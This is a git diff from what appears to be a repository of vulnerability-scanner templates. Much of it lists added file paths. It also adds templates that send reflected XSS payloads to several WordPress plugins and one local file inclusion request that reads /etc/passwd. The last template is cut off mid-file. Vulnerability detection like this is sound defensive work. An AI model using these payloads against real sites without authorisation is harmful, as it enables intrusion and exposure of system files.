 ./poc/cve/CVE-2024-1095-741eaa5507c75edbe90bc3ba4e40e5a9.yaml
 ./poc/cve/CVE-2024-1095.yaml
 ./poc/cve/CVE-2024-10952-4d042414df579b174bdf25e3587d620d.yaml
+./poc/cve/CVE-2024-10952.yaml
 ./poc/cve/CVE-2024-10958-b9e22eaad7c9ca71f94e8afa6dc3ff9c.yaml
 ./poc/cve/CVE-2024-10958.yaml
 ./poc/cve/CVE-2024-10961-c22c374f4ffe67db892c953e4cf45c93.yaml
@@ -35059,6 +35097,7 @@
 ./poc/cve/CVE-2024-11092-082481fd8094c2aeb1f67893a9a2bde4.yaml
 ./poc/cve/CVE-2024-11092.yaml
 ./poc/cve/CVE-2024-11093-1df61bf921aa4498efaa52534959b686.yaml
+./poc/cve/CVE-2024-11093.yaml
 ./poc/cve/CVE-2024-11094-16bcde675cb0d64a03b0f91cfb9ac467.yaml
 ./poc/cve/CVE-2024-11094.yaml
 ./poc/cve/CVE-2024-11098-1c24316a7d199994f4a28999bc5b5957.yaml
@@ -35158,8 +35197,10 @@
 ./poc/cve/CVE-2024-1129-0aba491c9fa777fb284efdb308d0b368.yaml
 ./poc/cve/CVE-2024-1129.yaml
 ./poc/cve/CVE-2024-11293-445cfc68523ff32c33fa3e493bbbe08c.yaml
+./poc/cve/CVE-2024-11293.yaml
 ./poc/cve/CVE-2024-1130-098b26182013dbcd4e8583ec0a56cb16.yaml
 ./poc/cve/CVE-2024-1130.yaml
+./poc/cve/CVE-2024-11324-744eea132cf5114313c8cf238c08e606.yaml
 ./poc/cve/CVE-2024-11325-316ac125b380ef0e67ba0167790d2d3b.yaml
 ./poc/cve/CVE-2024-11325.yaml
 ./poc/cve/CVE-2024-11326-0c8fabfd859db33f6ff486f4e38a0506.yaml
@@ -35176,6 +35217,7 @@
 ./poc/cve/CVE-2024-11334.yaml
 ./poc/cve/CVE-2024-1134-80f4a43eaea90aa0c6452abac73a271e.yaml
 ./poc/cve/CVE-2024-1134.yaml
+./poc/cve/CVE-2024-11341-d9c0a662afec84fc95603ed54f2aec86.yaml
 ./poc/cve/CVE-2024-11342-e05ffc71141aa17d097258d0a66a00da.yaml
 ./poc/cve/CVE-2024-11342.yaml
 ./poc/cve/CVE-2024-11354-0e62ca18f9bdb0611f368a7276263f85.yaml
@@ -35230,12 +35272,14 @@
 ./poc/cve/CVE-2024-11416.yaml
 ./poc/cve/CVE-2024-11418-fabf33e92d70128a9b53e9bacfb521c3.yaml
 ./poc/cve/CVE-2024-11418.yaml
+./poc/cve/CVE-2024-11420-2826e6328a5500d4faa1dc190ffc98cc.yaml
 ./poc/cve/CVE-2024-11424-1220902dc85195463b8e6b1e1cc1470c.yaml
 ./poc/cve/CVE-2024-11424.yaml
 ./poc/cve/CVE-2024-11426-ada6fe273d3c0447cca6a4f9c17bc628.yaml
 ./poc/cve/CVE-2024-11426.yaml
 ./poc/cve/CVE-2024-11428-f836c627b4521637a2e87c9552fd2a57.yaml
 ./poc/cve/CVE-2024-11428.yaml
+./poc/cve/CVE-2024-11429-f2942bb3824b4d9b7780f8fbd0f14593.yaml
 ./poc/cve/CVE-2024-11431-28e640b1d4d500562eca3cb2f0498909.yaml
 ./poc/cve/CVE-2024-11431.yaml
 ./poc/cve/CVE-2024-11432-5ab33a7cf49791cb848b0e8a8b92d04f.yaml
@@ -35265,6 +35309,7 @@
 ./poc/cve/CVE-2024-11463-0bf104abede23adeb8af80d1e15ce8a5.yaml
 ./poc/cve/CVE-2024-11463.yaml
 ./poc/cve/CVE-2024-11466-72daf3a307a80f4554dc36ae480bafa0.yaml
+./poc/cve/CVE-2024-11466.yaml
 ./poc/cve/CVE-2024-1157-d2b245ef8566e249301cbac489385050.yaml
 ./poc/cve/CVE-2024-1157.yaml
 ./poc/cve/CVE-2024-1158-c524eecd9e35e784bb852f087dadba65.yaml
@@ -35284,6 +35329,7 @@
 ./poc/cve/CVE-2024-1164-d45334c14232e5307860a2fc7211757b.yaml
 ./poc/cve/CVE-2024-1164.yaml
 ./poc/cve/CVE-2024-11643-d9e741221e1fd9e81d43cab52880c1fe.yaml
+./poc/cve/CVE-2024-11643.yaml
 ./poc/cve/CVE-2024-1165-e5a2e4d46ef76d07abec0e52c01b3693.yaml
 ./poc/cve/CVE-2024-1165.yaml
 ./poc/cve/CVE-2024-1166-97fcbf4fd3394c40eafb6b82472742e9.yaml
@@ -35310,6 +35356,7 @@
 ./poc/cve/CVE-2024-11732-6300c1dae27be21acd061d5288a24196.yaml
 ./poc/cve/CVE-2024-11732.yaml
 ./poc/cve/CVE-2024-11747-62f3cf7911a4e9abbe89a873183d1c75.yaml
+./poc/cve/CVE-2024-11747.yaml
 ./poc/cve/CVE-2024-1175-59b1d28bf860d8876b76c01c1e383ade.yaml
 ./poc/cve/CVE-2024-1175-72fe71d31a0485cb4068281d44a8c3e9.yaml
 ./poc/cve/CVE-2024-1175-d6c5d59d8ac18ee4256473011fc09f08.yaml
@@ -35319,8 +35366,10 @@
 ./poc/cve/CVE-2024-11761-c12436c899eba37de36a3435c092ea47.yaml
 ./poc/cve/CVE-2024-11761.yaml
 ./poc/cve/CVE-2024-11769-b830f60593d6bc500bc45458ecb55b68.yaml
+./poc/cve/CVE-2024-11769.yaml
 ./poc/cve/CVE-2024-1177-44b068407f4a1063af5594e6bad17afb.yaml
 ./poc/cve/CVE-2024-1177.yaml
+./poc/cve/CVE-2024-11779-dc5a2e8f9e2fe37de6208069b0a261fc.yaml
 ./poc/cve/CVE-2024-1178-26b664c2c5e2ce23e9059d41408b3b04.yaml
 ./poc/cve/CVE-2024-1178.yaml
 ./poc/cve/CVE-2024-11782-14c12bf1c0b93e64d33c585eee3be338.yaml
@@ -35332,29 +35381,38 @@
 ./poc/cve/CVE-2024-11805-ffe73c5f913e4c497e105b53c304b542.yaml
 ./poc/cve/CVE-2024-11805.yaml
 ./poc/cve/CVE-2024-11807-4dfe886308ff3702aa6f118a69b41dde.yaml
+./poc/cve/CVE-2024-11807.yaml
 ./poc/cve/CVE-2024-1181-e1aeb270ea4b669129dd0982e0118a5d.yaml
 ./poc/cve/CVE-2024-1181.yaml
 ./poc/cve/CVE-2024-11813-9a6d1b16c5d6577e7e1c14516dfd9060.yaml
+./poc/cve/CVE-2024-11813.yaml
 ./poc/cve/CVE-2024-11814-d146dcbc7cba6beb9447aebeae90eb88.yaml
+./poc/cve/CVE-2024-11814.yaml
 ./poc/cve/CVE-2024-1183.yaml
 ./poc/cve/CVE-2024-11844-07ec12dfcaf6ca937ccce1eaaff746ba.yaml
 ./poc/cve/CVE-2024-11844.yaml
 ./poc/cve/CVE-2024-11853-f5e53babbfd72e76b10eb0e04ce9ba66.yaml
 ./poc/cve/CVE-2024-11853.yaml
 ./poc/cve/CVE-2024-11854-a4609a0b6d30b84bf011e2cc0f757890.yaml
+./poc/cve/CVE-2024-11854.yaml
 ./poc/cve/CVE-2024-11866-3ba6e3d22ebebc0d52abd8e6540b8ac0.yaml
 ./poc/cve/CVE-2024-11866.yaml
 ./poc/cve/CVE-2024-11880-c4c58d47a5ee0ae307eff48c75fa9422.yaml
+./poc/cve/CVE-2024-11880.yaml
 ./poc/cve/CVE-2024-11897-ff5f1c15b11b473bc3f465bc84ff070d.yaml
+./poc/cve/CVE-2024-11897.yaml
 ./poc/cve/CVE-2024-11898-e1ae02693b266829682dda11586fd4c0.yaml
 ./poc/cve/CVE-2024-11898.yaml
 ./poc/cve/CVE-2024-11903-fe2ae85697a23f24ded288f0b3d83370.yaml
+./poc/cve/CVE-2024-11903.yaml
 ./poc/cve/CVE-2024-11918-095887b4ec8bd9bbd522023a03b46270.yaml
 ./poc/cve/CVE-2024-11918.yaml
 ./poc/cve/CVE-2024-11925-7672d2ec8fe92df70998a26a9cf9b901.yaml
 ./poc/cve/CVE-2024-11925.yaml
 ./poc/cve/CVE-2024-11935-088fa6aefbb99715a7cda0aadf2f36df.yaml
+./poc/cve/CVE-2024-11935.yaml
 ./poc/cve/CVE-2024-11952-16ad33d112d4e8604b5e9b540af90fd8.yaml
+./poc/cve/CVE-2024-11952.yaml
 ./poc/cve/CVE-2024-1203-cede147cec5ebe1dea014170dd370ad1.yaml
 ./poc/cve/CVE-2024-1203.yaml
 ./poc/cve/CVE-2024-1204-71ef2dafaa4ce9d17d3dff19cd522221.yaml
@@ -35372,6 +35430,7 @@
 ./poc/cve/CVE-2024-1209-262fb41bb4526e178dfcbc92b07bdb7c.yaml
 ./poc/cve/CVE-2024-1209.yaml
 ./poc/cve/CVE-2024-12099-c3677c8864d2ab9299be312763af0769.yaml
+./poc/cve/CVE-2024-12099.yaml
 ./poc/cve/CVE-2024-1210-c4ebf3e8de4f3a2f2f0803da094f581c.yaml
 ./poc/cve/CVE-2024-1210.yaml
 ./poc/cve/CVE-2024-1212.yaml
@@ -44300,6 +44359,7 @@
 ./poc/cve/CVE-2024-5020-cf4efc7082085c0f6918f4a4c6e7dd45.yaml
 ./poc/cve/CVE-2024-5020-df4a25635fdac04f8586ef1b70f5df86.yaml
 ./poc/cve/CVE-2024-5020-fb19dd13b2ee2b3c8e0e59c0ed43e6f9.yaml
+./poc/cve/CVE-2024-5020.yaml
 ./poc/cve/CVE-2024-5021-1b48a97f4f87b8e1c0d35951dcf47c52.yaml
 ./poc/cve/CVE-2024-5021.yaml
 ./poc/cve/CVE-2024-5024-df0641cd7d9eed4752dc979388d29728.yaml
@@ -47731,6 +47791,7 @@
 ./poc/cve/CVE-2024-8961-4998b1e6f19e994d65b96e8ba0290071.yaml
 ./poc/cve/CVE-2024-8961.yaml
 ./poc/cve/CVE-2024-8962-6b163dfda71e12f7e89fbd87a8f9cc55.yaml
+./poc/cve/CVE-2024-8962.yaml
 ./poc/cve/CVE-2024-8963.yaml
 ./poc/cve/CVE-2024-8964-c867d6af282cfd42151c0dd0c624594f.yaml
 ./poc/cve/CVE-2024-8964.yaml
@@ -58941,6 +59002,7 @@
 ./poc/detect/trace-axd-detect-10825.yaml
 ./poc/detect/trace-axd-detect-10826.yaml
 ./poc/detect/trace-axd-detect.yaml
+./poc/detect/twenty-detect.yaml
 ./poc/detect/txt-service-detect.yaml
 ./poc/detect/tyan-logo-detect.yaml
 ./poc/detect/tyan-rmm-ui-detect.yaml
@@ -66318,6 +66380,7 @@
 ./poc/microsoft/microsoft-teams-webhook.yaml
 ./poc/microsoft/microsoft-technet-community.yaml
 ./poc/microsoft/mightyforms-b4dc62c41d1725009c4ab8fe6ad0652f.yaml
+./poc/microsoft/mightyforms.yaml
 ./poc/microsoft/miniorange-firebase-sms-otp-verification-22c963942345caf88900612979c9cae6.yaml
 ./poc/microsoft/miniorange-firebase-sms-otp-verification-4468e2106e183a688613280714142718.yaml
 ./poc/microsoft/miniorange-firebase-sms-otp-verification-887b055ad889aa10b3dc934d36ffbf4f.yaml
@@ -67760,6 +67823,7 @@
 ./poc/open_redirect/eatery-restaurant-wp-theme-open-redirect.yaml
 ./poc/open_redirect/edd-conditional-success-redirects-2d0f5856608a10fb29f7e370acc0b71e.yaml
 ./poc/open_redirect/edd-conditional-success-redirects.yaml
+./poc/open_redirect/eelv-redirection-7ba8c53e6fc7be568c3f7112b05c02cb.yaml
 ./poc/open_redirect/elementorpage-open-redirect.yaml
 ./poc/open_redirect/eps-301-redirects-1bce881a5dd8f75156f2aebf72ebc190.yaml
 ./poc/open_redirect/eps-301-redirects-2268a5b6fb78d23bad4e5e4d75123bf2.yaml
@@ -82230,6 +82294,7 @@
 ./poc/other/all_in_one_carousel-plugin.yaml
 ./poc/other/all_in_one_carousel.yaml
 ./poc/other/allaccessible-ff46a2427fa1a4cf2e402b55544aa139.yaml
+./poc/other/allaccessible.yaml
 ./poc/other/allegiant-66ba1859ab560343222a23f4bdd2510b.yaml
 ./poc/other/allegiant-b4d18900456776f2adce5f77395e28da.yaml
 ./poc/other/allegiant-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -82379,6 +82444,7 @@
 ./poc/other/amilia-store-8f4f55b28e1600a1938f662af2440574.yaml
 ./poc/other/amilia-store.yaml
 ./poc/other/amin-chat-button-d9872add320bea51040aa99faf217f9e.yaml
+./poc/other/amin-chat-button.yaml
 ./poc/other/amministrazione-aperta.yaml
 ./poc/other/amministrazione-trasparente-17be1200393097d6c0f2017c2ab720e6.yaml
 ./poc/other/amministrazione-trasparente-8d5f2709f4d882c8054b56d253efa8ec.yaml
@@ -82631,6 +82697,7 @@
 ./poc/other/anyvar-a9615d731fc2ad9d799d3f00679987ea.yaml
 ./poc/other/anyvar.yaml
 ./poc/other/anywhere-elementor-59fc1a3e53c48965dc4568f48343bfa0.yaml
+./poc/other/anywhere-elementor-88412505e615b6e5307dc9f2ce5ac45d.yaml
 ./poc/other/anywhere-elementor-aaf86c94c98a955fd0879ffd8743d9b4.yaml
 ./poc/other/anywhere-elementor.yaml
 ./poc/other/anywhere-flash-embed-9889f7a493625908fda8b5ee8eb79804.yaml
@@ -83687,6 +83754,7 @@
 ./poc/other/b-banner-slider.yaml
 ./poc/other/b-slider-c318d9443b9d00b426d1d128c4e8de5a.yaml
 ./poc/other/b-slider.yaml
+./poc/other/b-testimonial.yaml
 ./poc/other/b2bking-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/other/b2bking.yaml
 ./poc/other/b2evolution-workflow.yaml
@@ -84412,6 +84480,7 @@
 ./poc/other/blockspare-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/other/blockspare-plugin.yaml
 ./poc/other/blockspare.yaml
+./poc/other/blocksy-23bf7578ab264efcde56f6817c09d0fd.yaml
 ./poc/other/blocksy-2582d3faae0bce7a210b6c0810e1429a.yaml
 ./poc/other/blocksy-45016b8948415eb75f141828c9ae8298.yaml
 ./poc/other/blocksy-7153d77d6f1b416e37512f881fabb8c2.yaml
@@ -87616,6 +87685,7 @@
 ./poc/other/contact-form-with-a-meeting-scheduler-by-vcita-25b2ca4e04d35642fcbbed4b92525040.yaml
 ./poc/other/contact-form-with-a-meeting-scheduler-by-vcita-76e681f44eb0b26a9e823a41ec7536d4.yaml
 ./poc/other/contact-form-with-a-meeting-scheduler-by-vcita-a905e62d671df4de0b3d1d784144a0b4.yaml
+./poc/other/contact-form-with-a-meeting-scheduler-by-vcita-d660a0b48b863cdd67353bc56f435b10.yaml
 ./poc/other/contact-form-with-a-meeting-scheduler-by-vcita.yaml
 ./poc/other/contact-form-with-captcha-52a6fd10b788cf11cd1c231f3c8d382c.yaml
 ./poc/other/contact-form-with-captcha-680eb3b1ba158bd59cafcd480c58cc64.yaml
@@ -89514,6 +89584,7 @@
 ./poc/other/dolibarr-workflow.yaml
 ./poc/other/dolibarr_erp-crm.yaml
 ./poc/other/dollie-512622075b972bd0f8449d9d0aa48977.yaml
+./poc/other/dollie.yaml
 ./poc/other/dolphin-installer.yaml
 ./poc/other/dolphinscheduler.yaml
 ./poc/other/dom-invaider.yaml
@@ -89761,6 +89832,7 @@
 ./poc/other/dp-addthis-c4fcffefb8f3e6c7a03176dcfcede11e.yaml
 ./poc/other/dp-addthis.yaml
 ./poc/other/dp-intro-tours-f04d6369a07334823cf17a6d39502a7e.yaml
+./poc/other/dp-intro-tours.yaml
 ./poc/other/dp-maintenance-mode-lite.yaml
 ./poc/other/dpfax.yaml
 ./poc/other/dplus-dashboard.yaml
@@ -90927,6 +90999,7 @@
 ./poc/other/email-address-encoder-plugin.yaml
 ./poc/other/email-address-encoder.yaml
 ./poc/other/email-address-obfuscation-f273d9a0882eeb6ac425829c1f57bffb.yaml
+./poc/other/email-address-obfuscation.yaml
 ./poc/other/email-artillery-10874919bbd2f9c0b668622810cb24a1.yaml
 ./poc/other/email-artillery-4303c55ac5611082b0ea09eda8d4c856.yaml
 ./poc/other/email-artillery-5909192e580332e4bac60bda9517a599.yaml
@@ -94830,6 +94903,7 @@
 ./poc/other/gutenslider-plugin.yaml
 ./poc/other/gutenslider.yaml
 ./poc/other/gutentor-d377e101a76164370c9cc0ec45a485ee.yaml
+./poc/other/gutentor-d5f23171ec6d2a624b85c7c3791a4d2a.yaml
 ./poc/other/gutentor.yaml
 ./poc/other/gutenverse-40a79e4610379f5cd721264ce32ca881.yaml
 ./poc/other/gutenverse-6f744d9cd8863d765631de4d3721f56e.yaml
@@ -98332,6 +98406,7 @@
 ./poc/other/list-pages-shortcode-21761f0c3baeaf30cfea46d274e3e181.yaml
 ./poc/other/list-pages-shortcode.yaml
 ./poc/other/listdom-33d389e6431dcb442a7c483fef36c7a4.yaml
+./poc/other/listdom.yaml
 ./poc/other/listeo-a4536019226209546973e841c145ca93.yaml
 ./poc/other/listeo-d425f8a4cb68df82c024ea1cc7c2270d.yaml
 ./poc/other/listeo.yaml
@@ -98585,6 +98660,7 @@
 ./poc/other/loyaa-information-automatic-editing-system.yaml
 ./poc/other/loytec-device.yaml
 ./poc/other/lpse.yaml
+./poc/other/lu-radioplayer-24c69778041edc97ab62887d5469ab7a.yaml
 ./poc/other/lu-radioplayer-e9077fc2fe72cb7682bed8570340bf86.yaml
 ./poc/other/lu-radioplayer.yaml
 ./poc/other/lua-runtime-error.yaml
@@ -101231,6 +101307,7 @@
 ./poc/other/newsmatic-7f04fe0b571a41ddada248b3475a29ce.yaml
 ./poc/other/newsmatic-c2883a60e880da757a0feabedd524744.yaml
 ./poc/other/newsmatic.yaml
+./poc/other/newsmunch-1eae09198c1f57697be0e29290d91cd2.yaml
 ./poc/other/newspack-ads-7cdcff626ec5e14115be00e6ae55d55d.yaml
 ./poc/other/newspack-ads.yaml
 ./poc/other/newspack-blocks-1b052f452f1bf0c9eb1a71371f42c0e6.yaml
@@ -103918,6 +103995,7 @@
 ./poc/other/posterous.yaml
 ./poc/other/posthog-admin-panel.yaml
 ./poc/other/posti-shipping-7e79b7d3a4e06757cf9ebe5b206927da.yaml
+./poc/other/posti-shipping.yaml
 ./poc/other/postie-37af4fad5c12509e72c1ef2660c11a10.yaml
 ./poc/other/postie-433f19d23cab0c6b950a8c7f83873fef.yaml
 ./poc/other/postie-73bed29884d8f2c387613f5a3bae7302.yaml
@@ -105872,6 +105950,7 @@
 ./poc/other/responsive-video-embed.yaml
 ./poc/other/responsive-video.yaml
 ./poc/other/responsive-youtube-videos-c753902da713fc236d749e583bf38f81.yaml
+./poc/other/responsive-youtube-videos.yaml
 ./poc/other/responsive.yaml
 ./poc/other/responsivevoice-text-to-speech-c78b99e405f430d59fc832d4c1e71825.yaml
 ./poc/other/responsivevoice-text-to-speech.yaml
@@ -107247,6 +107326,7 @@
 ./poc/other/sg-cachepress-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/other/sg-cachepress-plugin.yaml
 ./poc/other/sg-cachepress.yaml
+./poc/other/sg-helper.yaml
 ./poc/other/sg-security-06831df05efa95ed1c0c74fa11f27781.yaml
 ./poc/other/sg-security-103e6a6d5ba0e0dea96a4c25f0b57768.yaml
 ./poc/other/sg-security.yaml
@@ -109325,6 +109405,7 @@
 ./poc/other/stars-rating-be2ba6f8d3fbe560511d9bb86588619d.yaml
 ./poc/other/stars-rating.yaml
 ./poc/other/stars-testimonials-with-slider-and-masonry-grid-955a0bc25e66c35477866b8145b22f83.yaml
+./poc/other/stars-testimonials-with-slider-and-masonry-grid-f22ea0fab8779458702e21b3cfbd3810.yaml
 ./poc/other/stars-testimonials-with-slider-and-masonry-grid.yaml
 ./poc/other/start-element-manager-panel.yaml
 ./poc/other/startbbs.yaml
@@ -113999,6 +114080,7 @@
 ./poc/other/winters.yaml
 ./poc/other/wip-incoming-lite-cf7facf8e3af34332be0173ed93179a2.yaml
 ./poc/other/wip-incoming-lite.yaml
+./poc/other/wip-woocarousel-lite-58c536c08bbfd58c8c5df3f776075f47.yaml
 ./poc/other/wireclub.yaml
 ./poc/other/wireguard-preshared.yaml
 ./poc/other/wireless-access-point-controller.yaml
@@ -116860,6 +116942,7 @@
 ./poc/remote_code_execution/Yonyou-GRP_U8-SqliToRce.yaml
 ./poc/remote_code_execution/account-manager-woocommerce-198aaf82d5ab4648c4ab1ac1d78a7c90.yaml
 ./poc/remote_code_execution/account-manager-woocommerce.yaml
+./poc/remote_code_execution/accounting-for-woocommerce-53b52ac147da254acf1412f550aa0c64.yaml
 ./poc/remote_code_execution/acf-for-woocommerce-product-5f5d0f52c1d912f42f77906eaf762cdd.yaml
 ./poc/remote_code_execution/acf-for-woocommerce-product-6477bf18cad6c823db485408d49b337b.yaml
 ./poc/remote_code_execution/acf-for-woocommerce-product.yaml
@@ -118228,6 +118311,7 @@
 ./poc/remote_code_execution/order-on-chat-for-woocommerce-8ae389bb36c025a1eb7545aa6a45c3d6.yaml
 ./poc/remote_code_execution/order-on-chat-for-woocommerce.yaml
 ./poc/remote_code_execution/order-status-for-woocommerce-1bfb8bcea72e31f2a9aedd55e2f9c765.yaml
+./poc/remote_code_execution/order-status-for-woocommerce.yaml
 ./poc/remote_code_execution/order-xml-file-export-import-for-woocommerce-0e7c6b52509d8bfd0e2b068d7ec9abcb.yaml
 ./poc/remote_code_execution/order-xml-file-export-import-for-woocommerce-3a460d6221faf27eee0fa8c18c8a68f2.yaml
 ./poc/remote_code_execution/order-xml-file-export-import-for-woocommerce-9e1af010999e3eb73bf8d77719668b1a.yaml
@@ -121621,6 +121705,7 @@
 ./poc/social/easy-facebook-likebox-c10c9a14d72b9033cae6068b106fcf2b.yaml
 ./poc/social/easy-facebook-likebox-df557b2e822a08ef8819aeeccc39b9a7.yaml
 ./poc/social/easy-facebook-likebox-premium-f57a9bb09c6115f6da291aba1defee73.yaml
+./poc/social/easy-facebook-likebox-premium.yaml
 ./poc/social/easy-facebook-likebox.yaml
 ./poc/social/easy-social-feed.yaml
 ./poc/social/easy-social-icons-00afedcccfcc22be5e87fadbe0b37bd6.yaml
@@ -128240,6 +128325,7 @@
 ./poc/sql/register-plus-22264db95da9196d43a1bdf2e5521ff8.yaml
 ./poc/sql/register-plus-redux-bfa960a7de764bc4ebc9934add9db5eb.yaml
 ./poc/sql/relais-2fa-4e63bf8535f0db922ef9a969b49392a2.yaml
+./poc/sql/related-post-50f470db25db3e9b2fd4bb5c39c48cf6.yaml
 ./poc/sql/related-posts-d735a79e2fa282de80b5a7aabcc877db.yaml
 ./poc/sql/related-posts-for-wp-e8355991c166a9db9087416fb98054c7.yaml
 ./poc/sql/relevanssi-083c1e79640f4f1eb036db49a088252d.yaml
@@ -133961,6 +134047,7 @@
 ./poc/web/weblogic-workflow.yaml
 ./poc/web/weblogic_server.yaml
 ./poc/web/webmail-basic.yaml
+./poc/web/webmail.yaml
 ./poc/web/webmaster-tools-061907236262ff86bb30a9bcd4762283.yaml
 ./poc/web/webmaster-tools-5f21794f8d039fbb45515734fc6d980a.yaml
 ./poc/web/webmaster-tools-verification-76db360b645ab34674b53ba057e03260.yaml
@@ -138067,6 +138154,7 @@
 ./poc/wordpress/wp-easycart-plugin.yaml
 ./poc/wordpress/wp-easycart.yaml
 ./poc/wordpress/wp-ecards-invites-d53c07f5ceaade0dccf7cf3c820e8378.yaml
+./poc/wordpress/wp-ecards-invites.yaml
 ./poc/wordpress/wp-ecommerce-cvs-importer-45ba464412c6ae4b94e80349ccf8b660.yaml
 ./poc/wordpress/wp-ecommerce-cvs-importer.yaml
 ./poc/wordpress/wp-ecommerce-paypal-300e106676966a486b98e353420db12f.yaml
@@ -138939,6 +139027,7 @@
 ./poc/wordpress/wp-job-manager-8d16795e662aa6e3ad89f09de24a8bf3.yaml
 ./poc/wordpress/wp-job-manager-c2b4ca29790e54f9ab17327608e8cce0.yaml
 ./poc/wordpress/wp-job-manager-companies-d6cd35f3331ab8d505b67ef0ac181812.yaml
+./poc/wordpress/wp-job-manager-companies.yaml
 ./poc/wordpress/wp-job-manager-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/wordpress/wp-job-manager-de2a96378c8649334d046a951b902360.yaml
 ./poc/wordpress/wp-job-manager-f495eb30203bc7d2ca90aeef78e792ca.yaml
diff --git a/poc/cve/CVE-2011-4618-2071.yaml b/poc/cve/CVE-2011-4618-2071.yaml
new file mode 100644
index 0000000000..133b6c12d3
--- /dev/null
+++ b/poc/cve/CVE-2011-4618-2071.yaml
@@ -0,0 +1,39 @@
+id: CVE-2011-4618
+
+info:
+  name: Advanced Text Widget < 2.0.2 - Reflected Cross-Site Scripting
+  author: daffainfo
+  severity: medium
+  description: A cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2011-4618
+    - http://web.archive.org/web/20210121070605/https://www.securityfocus.com/archive/1/520589
+    - http://wordpress.org/support/topic/wordpress-advanced-text-widget-plugin-cross-site-scripting-vulnerabilities
+    - http://www.securityfocus.com/archive/1/520589
+  remediation: Upgrade to a supported version.
+  classification:
+    cve-id: CVE-2011-4618
+  tags: cve,cve2011,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/02/18
diff --git a/poc/cve/CVE-2011-5181-2117.yaml b/poc/cve/CVE-2011-5181-2117.yaml
new file mode 100644
index 0000000000..7e86bce793
--- /dev/null
+++ b/poc/cve/CVE-2011-5181-2117.yaml
@@ -0,0 +1,30 @@
+id: CVE-2011-5181
+
+info:
+  name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  description: Cross-site scripting (XSS) vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181
+ 
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/poc/cve/CVE-2014-9094-2417.yaml b/poc/cve/CVE-2014-9094-2417.yaml
new file mode 100644
index 0000000000..8e73d7da9b
--- /dev/null
+++ b/poc/cve/CVE-2014-9094-2417.yaml
@@ -0,0 +1,29 @@
+id: CVE-2014-9094
+
+info:
+  name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting
+  author: daffainfo
+  severity: medium
+  description: "Multiple cross-site scripting (XSS) vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter."
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
+  tags: cve,cve2014,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<script>alert(1)</script>"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/poc/cve/CVE-2015-1000012-2462.yaml b/poc/cve/CVE-2015-1000012-2462.yaml
new file mode 100644
index 0000000000..87d6842285
--- /dev/null
+++ b/poc/cve/CVE-2015-1000012-2462.yaml
@@ -0,0 +1,28 @@
+id: CVE-2015-1000012
+info:
+  name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)
+  author: daffainfo
+  severity: high
+  reference:
+    - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.50
+    cve-id: CVE-2015-1000012
+    cwe-id: CWE-200
+  description: "Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin"
+  tags: cve,cve2015,wordpress,wp-plugin,lfi
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+        part: body
+      - type: status
+        status:
+          - 200
diff --git a/poc/cve/CVE-2015-2807-2497.yaml b/poc/cve/CVE-2015-2807-2497.yaml
new file mode 100644
index 0000000000..629ffb8b95
--- /dev/null
+++ b/poc/cve/CVE-2015-2807-2497.yaml
@@ -0,0 +1,27 @@
+id: CVE-2015-2807
+info:
+  name: Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  reference:
+    - https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-2807
+  tags: cve,cve2015,wordpress,wp-plugin,xss
+  description: "Cross-site scripting (XSS) vulnerability in js/window.php in the Navis DocumentCloud plugin before 0.1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter."
+requests:
+  - method: GET
